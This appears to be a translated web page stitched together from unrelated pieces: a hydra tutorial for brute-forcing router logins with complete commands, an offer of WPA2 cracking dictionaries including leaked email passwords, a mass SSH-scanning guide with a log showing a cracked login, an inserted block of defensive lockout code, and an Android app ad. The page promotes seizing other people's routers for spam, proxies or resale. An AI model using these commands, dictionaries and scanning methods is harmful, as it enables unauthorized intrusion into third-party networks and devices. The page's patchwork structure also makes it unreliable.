Capturing a router: mass scan and SSH brute force. Logins and passwords for brute-forcing routers

*There could be a warning here that you should not use this program for criminal purposes, but hydra writes this before each hacking session*

In general, I decided to delve into the settings of the router according to my needs. I typed in an address that was familiar to everyone, and then they asked for the password. What should I do? Well, I started going through passwords, but their number was too large to go through everything and too small to do a reset.

And I opened google. After a couple of inquiries, I learned about such a thing as hydra. And then it began: the thirst for discovery, the search for the unknown, and so on.

Let's get started

The first thing I did was compile a dictionary of passwords, no more, no less, as many as 25 combinations. Next, download either Kali linux or Hydra itself (if you are a penguin and you have Linux). Now we have two options (well, like two, I found information on two options).

Or you have a dialog box like this:

Or a form on the website asks for a login and password. Mine is the first option, so let's start with that. On our way to the “admin panel” there is a guard in the form of a dialog box. This type of authorization is http-get.

Open the terminal. Enter:

hydra -l admin -P myPass.txt -s 80 192.168.1.1 http-get /
Where after “-l” comes the login, after “-P” the dictionary, after “-s” the port. We also have other flags at our disposal:

-R restore previous interrupted/aborted session
-S perform SSL connection
-s PORT if the service is not on the default port, you can set the port here
-l LOGIN or -L FILE with LOGINS (names), or load several logins from FILE
-p PASSWORD or -P FILE with passwords for brute force, or load several passwords from FILE
-x MINIMUM:MAXIMUM:CHARACTER_SET generating passwords for brute force, type "-x -h" for help
-e nsr “n” - try with an empty password, “s” - login as password and/or “r” - reverse credentials
-u focus on the user, not the passwords (effective! implied by using the -x option)
-C FILE format where “login:password” are separated by colons, instead of the -L/-P option
-M FILE list of servers to attack, one entry per line, after the colon ":" you can specify the port
-o FILE write found login/password pairs to FILE instead of standard output
-f / -F exit when the login/password pair is matched (-M: -f for host, -F globally)
-t TASKS number of TASKS running in parallel (per host, default: 16)
-w / -W TIME time to wait for responses (32 seconds) / between connections per thread
-4 / -6 prefer IPv4 (default) or IPv6 addresses
-v / -V / -d verbose mode / show login+password for each attempt / debugging mode
-q do not print connection error messages
-U detailed information about using the module
server target: DNS, IP or 192.168.0.0/24 (this OR -M option)
service service for hacking (see list of supported protocols)
OPT some service modules support additional input (-U for module help)


Well, something like this:

Second option:

Not mine, honestly taken from Anti-Chat, with the author’s grammatical errors corrected (I left an abundance of punctuation marks). I wonder if this can be considered a translation?

We are greeted with a form on the website:


This authorization method is http-post-form, and here we need to tinker a little, since we need to understand how the browser sends data to the router.

In this case, I used the Chrome browser (its analogue Chromium in Kali Linux, installed via apt-get install chromium).

Now you need to do one very stupid thing... specify the wrong login and pass...
We'll see why later...

Press F12 to go to web page editing mode.


Go to Network → check the Preserve log box.


We enter a false login and password...

So what's up? This will not work! Moreover, after several unsuccessful login attempts, the form is blocked for 180 seconds.

Go to the Headers tab and look for the line:

Request URL:http://192.168.0.1/index.cgi
We cut off everything up to and including the IP address, leaving /index.cgi... Congratulations, we have found the first part of the authorization script... Let's move on... Go to the Form Data tab and change the display mode to view source.

update_login=login&update_password=password&check_auth=y&tokenget=1300&update_login=login&update_password=password
Bingo! We found the second part of the authorization script! A little bit more! Now you need to find the page with the error message... You need to click on the ELEMENTS tab.


And select the HTML code element (CTRL+SHIFT+C) and select the window with the error message... in this case - Authentication failed!


Authentication failed!
Choose:

<span langkey="bad_auth">
and edit a little... bad_auth - that's it! The key is practically in our pocket... Now we can write the entire authorization string:

index.cgi:update_login=login&update_password=password:bad_auth
Now you need to substitute ^USER^ instead of “login” and ^PASS^ instead of “password” and then the line will look like:

index.cgi:update_login=^USER^&update_password=^PASS^:bad_auth
Enter the command:

hydra -l admin -P router-pass.dic -t 1 -e nsr -vV -f -s 80 192.168.0.1 http-post-form "/index.cgi:update_login=^USER^&update_password=^PASS^:bad_auth"
Please note that there is a colon between parts of the script! it is necessary! By the way, there was no blocking of the form through the hydra... This is very pleasing.


I can’t be sure that the second method works, since I don’t have the appropriate router model. You'll have to trust the expressive person from Antichat.

If anyone is interested, please check and write in the comments. I worked with the TL-WR1043N/TL-WR1043ND router. Router from Antichat - D-link300NRU.

Thank you for your attention!

Dictionaries for brute wifi are often used by professional hackers in their activities. Of course, you will also need specialized software, which is necessary for synchronization with the dictionary database.

But if the programs themselves can be easily downloaded from any open source, then you will have to look hard for good dictionaries for Brutus. Moreover, this is a rare and very valuable find on the Internet.

But while everything is clear to a professional without further ado, for a less experienced audience all this terminology is a mystery. The average user cannot understand why and for what purpose brute-forcing wifi WPA2 may be required. How is it used, and what is all this about?

What is Brutus

Brutus is one of the systems for cracking a password by selecting a key combination. Your computer will be able to guess the password if you have the appropriate software and a dictionary database.

Brute can be used almost anywhere where the system is protected with a password. This could be a mailbox, a social page or something else.

We will talk in more depth about brute access to a wifi router. Our goal is to gain access to a third-party Internet connection. And this is where dictionaries, software and patience are required.

Where does Brute Wifi begin?

Initially, it is worth distinguishing between the available router encryption systems - WPA and WPA2. In both cases, you can work with password generation, but it is the latter option for encrypting the system that is less desirable.

The dictionary for Brute wifi wpa2 connects to software that automatically generates and searches for matches. This procedure is lengthy and can take at least several days. But again, this only depends on the complexity of the password itself.

But if you managed to download dictionaries from a reliable and proven database, then you can count on a positive final result.

Are all dictionaries the same?

Brute-forcing wifi access should only be started if you clearly understand all the sequential steps and stages that you will have to overcome. The fact is that even brute wifi dictionaries are very different from each other and their use may not always be effective if you select the wrong database.

Also take into account the maximum number sequence in the dictionary you downloaded. Most often, users use 8 digits in the password, but there are dictionaries with a base of password combinations of 7-9 digits.

The wifi password dictionary should be adapted to your region. That is, there are separate databases in English, Spanish, French and other languages. In our case, we need a database of Russian password combinations.

Before synchronizing dictionaries, take the time to view them in a text editor and make sure that they are compiled at the proper level and cover the majority of popular combinations.

Hacking access to wifi from the phone screen

It is quite possible to perform wifi brute force from an Android smartphone, since the corresponding software is available for free and can be downloaded without restrictions. And then after installation, you will need to use the same dictionaries, where you will probably select a unique password combination.

The best dictionaries on the web

We have collected the best dictionary databases for subsequent password selection and wifi brute force. It’s easy to verify this - download our dictionaries to your computer and try them.

The presented dictionaries have one of the largest databases of combinations of password options for Russian queries. And the dictionaries themselves are constantly being improved and supplemented, which is important for new users.

Download dictionaries for Brute WiFi (wpa, wpa2)

  • [Dates in various spellings]:
  • [Small dictionary of 9 million words]:
  • [Passwords of emails leaked in 2014]:

Unlike full-fledged servers, which usually have PAM (Pluggable Authentication Modules) configured to block access for a time set in the config after several (usually three to five) unsuccessful login attempts, the Linux on a router is stripped down. There is no PAM on it, so nothing prevents it from being brute-forced. And this idea - brute force and seizure of routers - is, one might say, trending today!
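Added example, not from the original page: a server-side lockout of the kind the paragraph says routers lack, enforced on every request so that it also covers clients that bypass the browser form (the 180-second block described earlier was not triggered by the tool). `LoginThrottle`, the thresholds other than 180 seconds, and the sample addresses and credentials are assumptions constructed for illustration.

```python
import hmac
from collections import defaultdict, deque

MAX_FAILURES = 3     # assumed threshold (the text says three to five)
WINDOW_SECONDS = 60  # assumed: older failures are forgotten
LOCK_SECONDS = 180   # same duration as the form block described earlier


class LoginThrottle:
    """Server-side lockout keyed by source address and by account name."""

    def __init__(self, credentials):
        self.credentials = credentials      # {login: password}, demo store only
        self.failures = defaultdict(deque)  # key -> recent failure timestamps
        self.locked_until = {}              # key -> time the lock expires

    def _record_failure(self, key, now):
        recent = self.failures[key]
        recent.append(now)
        while recent[0] <= now - WINDOW_SECONDS:
            recent.popleft()
        if len(recent) >= MAX_FAILURES:
            self.locked_until[key] = now + LOCK_SECONDS
            recent.clear()

    def attempt(self, source_ip, login, password, now):
        keys = (("ip", source_ip), ("user", login))
        # Check locks before the password: a correct guess made while
        # locked must be refused, or the lock does not stop guessing.
        if any(self.locked_until.get(k, 0) > now for k in keys):
            return "locked"
        expected = self.credentials.get(login)
        # Always run a constant-time comparison, even for unknown logins.
        same = hmac.compare_digest((expected or "").encode(), password.encode())
        if expected is not None and same:
            # Reset only the account counter; resetting the per-address one
            # would let a client with one valid login clear its own history.
            self.failures.pop(("user", login), None)
            return "ok"
        for k in keys:
            self._record_failure(k, now)
        return "denied"


def replay(throttle, attempts, start=0.0, gap=1.0):
    """Submit (ip, login, password) tuples `gap` seconds apart."""
    return [throttle.attempt(ip, user, pw, start + i * gap)
            for i, (ip, user, pw) in enumerate(attempts)]


# Constructed sample: one address working through a login;password list.
CREDS = {"ftp": "123456"}
SAMPLE = [("203.0.113.7", u, p) for u, p in [
    ("admin", "admin"), ("support", "support"), ("root", "123456"),
    ("ubnt", "ubnt"), ("ftp", "123456")]]

if __name__ == "__main__":
    print(replay(LoginThrottle(CREDS), SAMPLE))
```

Locking by account name lets any client lock out the real administrator, so on a device with a single admin account the per-address key combined with a growing delay is the safer default.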

Our goal is your router

Why do you need to seize the router? It depends on the hacker’s imagination: you can use it to send spam, or turn it into a private SOCKS (proxy). Or you can sell the access you receive - this pleasure costs, according to one of my friends, up to $200 a month, and this product is quite popular.

Scanning routers

To gain access, hackers use a simple but effective program Tunnel Scanner. The Type parameter specifies the scanning type: by static login, by static password, by list of logins/passwords. The third option (By Login;Password List) is usually the most effective.

The Static parameter allows you to specify the range of IP addresses that will be scanned. If you enable the IP ranges from file checkbox, the range of IP addresses will be taken from the file specified in the IP ranges field (by default, this is a file named ip.txt). The ranges in it are indicated as shown in the screenshot below.

The list of logins and passwords is specified by the Login;Password parameter. By default it is taken from the words.txt file. Of course, the example list below is quite poor, but I think you can easily find a more advanced one on the Internet (or you can be smart and create your own).


The Threads parameter sets the number of simultaneous threads for the brute. The default value is 900 - this is more than enough. The Timeout parameter specifies the timeout in seconds between attempts.

Well, all that remains is to press the Start button.

As you can see, we have already received the first results. Let's analyze them:

37.112.128.160 - failed to connect
37.112.128.164 - checking admin;admin
37.112.128.163 - failed to connect
37.112.128.162 - failed to connect
37.112.128.165 - failed to connect
37.112.128.161 - failed to connect
37.112.128.164 - [-]: admin;admin
37.112.128.164 - checking support;support
37.112.128.164 - [-]: support;support
37.112.128.164 - checking root;123456
37.112.128.164 - [-]: root;123456
37.112.128.164 - checking ubnt;ubnt
37.112.128.164 - [-]: ubnt;ubnt
37.112.128.164 - checking ftp;123456
37.112.128.164 - [+]: ftp;123456
…

The number in square brackets is the thread number (it doesn't matter to us). Next comes the IP address being scanned. The line failed to connect means that the SSH port is closed - either completely, or for us (by the firewall). A line like [-]: admin;admin reports that the SSH port is open, but the password and/or login did not match. But a similar line with + says that everything was successful:


Editor overview

We provide Router Brute Force ADS 2 APK file for Android 2.0 or higher or Blackberry (BB10 OS) or Kindle Fire and many Android Phones such as Samsung Galaxy, LG, Huawei and Moto. Router Brute Force ADS 2 APK is a free Apps tools.

Its newest and latest version for Router Brute Force ADS 2 APK is (evz.android.rbf_ads.apk). It's easy to download and install to your mobile phone (android phone or blackberry phone). Read Router Brute Force ADS 2 APK detail and permission below and click download apk button to go to download page.


in detail

The new version is finally released!
please do not use old versions,
and remove it and use only this version. Simple and effective brute force for page/control admin routers! (Basic authentication -> base64 access) Do you have a free WiFi connection?
but if you want to access the router settings, to open some ports or something else you need a password.
Here's Brute Force Router(RFB) to the rescue!!! It comes with a sample text file that includes 398 passwords for different default routers, but don't forget that you can update it with your details! If you want to enter special ones passwords, you can use comma future...be sure to check the login because it is case sensitive in some routers(Admin/Admin).Use this tool only if you have a strong WiFi signal and should not use dictionary files more than 5 MB, Otherwise it will work very slowly! RBF automatically gets the default gateway and generates the URL, so you don't need to do any preparations (only if you are already connected to WiFi). This is an experimental tool. use it at your own risk! Please rate the tool and leave comments!
if you have problems with it, feel free to email me.* Please read the description carefully and don't leave negative feedback due to low WiFi signal or large dictionary files! *!!! THIS IS AN EXPERIMENTAL APPLICATION!!!
But!!! NOT CURRENTLY WORKING ON ALL ROUTERS!!!
But!!! SO IF YOU WANT TO HELP, PLEASE LEAVE FEEDBACK WITH YOUR ROUTER MODEL AND MANUFACTURER!!! What's new?
What's new in this version: - better and faster algorithm
- this is a big bug fix
- And the interface has been slightly changed, so
- new *check* buttons for checking the URL for Vulnerability.
- Russian language added
